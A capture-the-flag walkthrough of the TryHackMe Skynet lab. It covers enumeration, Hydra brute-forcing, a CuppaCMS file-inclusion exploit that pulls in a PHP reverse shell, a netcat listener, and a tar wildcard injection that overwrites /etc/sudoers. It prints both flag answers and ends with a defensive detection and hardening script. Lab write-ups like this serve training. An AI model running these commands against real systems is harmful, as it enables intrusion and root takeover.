TryHackMe Skynet Walkthrough
Sure, I can provide a general walkthrough for the Skynet room on TryHackMe. Here's a step-by-step guide:
Deploy the Machine:
Log in to your TryHackMe account and navigate to the Skynet room. Click on the "Deploy" button to spawn the virtual machine.
- Adding an entry to your /etc/hosts file lets you refer to the machine by a memorable hostname instead of its IP address. It also helps when DNS resolution is unavailable or unreliable.
echo "10.10.225.54 Skynet.thm" | sudo tee -a /etc/hosts
Enumeration:
Start by enumerating the services running on the machine using tools like Nmap.
Run a basic Nmap scan to discover open ports and services:
nmap -sCV <machine_IP>
Enumerate Web Service:
Once you have identified the open ports, check if there's a web service running. Visit the web service in your browser by navigating to http://
Examine the Website:
Look for any clues or hidden directories on the website. You can use tools like dirsearch for directory brute-forcing. Examine the page source for any hidden comments or JavaScript.
dirsearch:
smbclient:
We connect to the SMB service with smbclient to list the shares on the device. Two shares are of interest: anonymous and milesdyson.
smbclient -L skynet.thm
Content of attention.txt:
Content of log1.txt, a password list:
Cracking the SquirrelMail password:
You can do this easily using Burp Suite and Hydra.
hydra -l milesdyson -P log1.txt skynet.thm http-post-form "/squirrelmail/src/redirect.php:login_username=^USER^&secretkey=^PASS^:incorrect" -t 20
Hydra:
Burp Suite:
We found it! Now we can log in:
Only the first one looks to be important for us:
We found the password for SMB, so now we can log in:
smbclient //$ip/milesdyson -U milesdyson
We get access. Inside are a lot of notes and files we don't necessarily need; the only file that is useful for us is important.txt.
Inside we find the secret directory:
If we go to that directory we find a simple page. Let's run dirb to see if there are more hidden directories:
dirb http://10.10.167.117/45kra24zxs28v3yd/
We find /administrator. Going there, we see that the page is running CuppaCMS, which we can search for on searchsploit:
Sign in: Cuppa CMS
Exploitation:
We open searchsploit and search for an exploit for the CMS.
Reading the text file for the exploit, we see that it is possible to read local files on the target machine by targeting the urlConfig parameter in alertConfigField.php. The best part is that it doesn't even require a login to the CMS.
We can read the /etc/passwd file on the target device:
http://target/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd
We can get our reverse shell from revshells.com: select PHP PentestMonkey, enter your machine IP and the listening port (in my case I chose 1234), download it and put it inside a folder. Start an HTTP server in the folder where you downloaded your reverse shell:
python3 -m http.server
Start our listener:
nc -lvnp 1337
Request the link:
http://skynet/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.9.224.219/php-reverse-shell.php
After requesting this in the browser, a reverse shell should open on our side. Now we have our reverse shell!
We can spawn a TTY shell with Python:
python -c 'import pty;pty.spawn("/bin/bash")'
We see that there is a user named milesdyson. The user flag is inside their home directory.
Answer: 7ce5c2109a40f958099283600a9ae807
Inside /home/milesdyson/backups we find a file backup.sh, and we see that this script is executed every minute, so we can perform a tar wildcard injection.
We run these commands inside the folder /var/www/html:
echo 'echo "www-data ALL=(root) NOPASSWD: ALL" > /etc/sudoers' > pavan.sh
echo "/var/www/html" > "--checkpoint-action=exec=sh pavan.sh"
echo "/var/www/html" > --checkpoint=1
Once the backup script has run, we get a root shell and can find the flag in /root/root.txt:
Answer: 3f0372db24753accc7179a282cd6a949
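From the defender's side, the root cause of the wildcard injection above is a backup script that runs tar on a glob in a directory the web user can write to. The following is an added example, not code from the original walkthrough or from the room: a check that flags filenames tar would parse as options, and a hardened backup command that feeds tar explicit paths instead of a glob (it assumes GNU tar and a hypothetical `cd DIR && tar cf backup.tgz *` cron script).

```sh
#!/bin/sh
# Added example, not part of the original walkthrough: a defender-side check for
# the tar wildcard injection shown above, plus a hardened backup command.
# Assumed (hypothetical) setup: a cron script runs `cd DIR && tar cf backup.tgz *`
# on a directory that an unprivileged web user can write to.

# Print any filename in DIR that a shell glob would hand to tar as an option
# (e.g. "--checkpoint=1"). Returns 1 when at least one such name exists.
find_option_filenames() {
    dir=$1
    count=0
    for f in "$dir"/-*; do
        [ -e "$f" ] || continue          # glob matched nothing: skip literal pattern
        count=$((count + 1))
        printf 'suspicious filename: %s\n' "${f#"$dir"/}"
    done
    [ "$count" -eq 0 ]
}

# Hardened backup: feed explicit "./name" paths from find instead of a glob.
# With --null, GNU tar treats every list entry as a file name even if it
# begins with a dash, so "--checkpoint-action=..." is archived, not executed.
# $2 must be an absolute path outside $1.
safe_backup() {
    dir=$1
    out=$2
    (cd "$dir" && find . -mindepth 1 -print0 | tar --null -cf "$out" -T -)
}
```

Running find_option_filenames from a cron job or a file-integrity monitor on the backed-up directory gives an early warning before the next scheduled tar run.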